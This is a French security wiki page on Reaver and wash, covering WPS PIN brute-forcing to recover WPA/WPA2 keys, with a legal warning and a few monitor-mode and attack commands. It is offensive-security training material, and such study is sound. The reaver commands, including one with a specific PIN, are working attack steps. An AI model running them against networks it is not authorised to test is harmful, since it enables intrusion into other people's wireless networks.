Reaver

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Attaque WPS
Outils reaver, wash
Cible Recuperation de la cle WPA-PSK via WPS

reaver exploite une faiblesse du WPS (Wi-Fi Protected Setup) pour retrouver la cle WPA/WPA2-PSK d'un point d'acces par attaque en force brute du code PIN. L'outil wash repere les points d'acces dont le WPS est actif.

Preparation

Passer l'interface en mode moniteur (voir Aircrack) :

ifdown wlan0
iwconfig wlan0 mode monitor
ifup wlan0
ifconfig wlan0 up
airmon-ng start wlan0 [channel]

Utilisation

Reperer les points d'acces WPS :

wash -i mon0

Lancer l'attaque :

reaver -i mon0 -b [bssid_mac] -vv

Avec un PIN connu (option -p) :

reaver -i mon0 -b [bssid_mac] -p 96708002 -vv

Une fois le WPS casse, reaver renvoie la cle WPA-PSK.

Voir aussi

  • Aircrack — mise en mode moniteur et cassage WPA
  • Wifite — automatisation integrant reaver